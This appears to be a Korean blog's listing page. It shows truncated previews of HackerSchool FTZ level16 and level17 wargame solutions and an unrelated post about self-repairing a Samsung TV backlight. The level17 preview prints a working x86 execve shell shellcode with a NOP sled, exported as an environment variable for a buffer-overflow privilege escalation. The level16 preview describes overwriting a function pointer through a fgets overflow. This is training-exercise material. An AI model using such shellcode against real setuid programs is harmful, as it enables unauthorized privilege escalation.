728x90 반응형 전체 글128 해커스쿨 FTZ level17 (HackerSchool) 풀이 힌트를 보자 level16과는 다르게 shell() 함수가 없다.대신 uid를 level18로 바꿔주고 call() 을 하는 부분이 있다.그렇다면 call() 함수가 printit() 함수를 불러오는게 아닌 shell을 얻는 코드로 덮어씌우자. 1. 환경변수 등록하기(bash 쉘을 띄워주는 쉘코드)export TRAP=`python -c 'print "\x90" * 100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" ' `입력 후 export 입력하여 잘 등록되었는지 확인마지막 부분에 위와 같이(?) 되어있다면 잘 입력된 것이다.이게 맞나 싶은 분들이 있을 수.. 2020. 12. 28. 해커스쿨 FTZ level16 (HackerSchool) 풀이 바로 hint부터 보자 level17의 uid로 쉘을 열어주는 shell() 함수가 있고printit() 함수가 정의되어 있다.하지만 main()에는 printit() 함수만 call() 한다.fgets() 함수의 BOF 취약점을 이용해서call() 하는 부분에 shell() 함수의 주소값을 덮어씌워보자. 1. call() 함수가 어디에서 실행할 함수를 불러오는지 주소값 알아내기 gdb를 해보자. set disassembly-flavor intel 코드가 뭔지 궁금한 사람더보기------------------------------------------------------------------------------------------------set disassembly-flavor intel 은 어.. 2020. 12. 28. 삼성 40인치 LED TV UN40F6450 백라이트 셀프수리 7월의 어느날.집 한구석에 안쓰는 TV가 하나 있었다.노트북에 연결해서 모니터로 쓰려고 켜봤더니 윗부분이 어둡다.왜지? 싶어서 찾아보니 백라이트가 나간거라고 한다.그래서 처음엔 수리를 맞길 생각으로 알아봤는데사설업체는 10만원대 부르고삼성전자 서비스센터는 30을 불렀다;;;백라이트만 교체하는건 안되고 액정도 같이 갈아야 한다나 뭐라나…가격들이 다 후덜덜해서 걍 내가 고치고 말지 하고 수리방법을 찾아봤다.보니까 엄청 어려워 보이지 않았고 할 수 있을 것 같았다.다행히 백라이트만 파는 곳이 있어서 주문을 했다.그런데 몇 일 후에 결제취소 문자가 왔네???업체에 전화해 보니 기존 물량은 다 나갔고 부품을 해외에서 수입해 오는건데코로나 때문에 지금 오질 못하고 있단다…하…결국 TV는 다시 구석행 ㅎㅎ 그렇게 .. 2020. 12. 13. 이전 1 ··· 23 24 25 26 다음 728x90 반응형
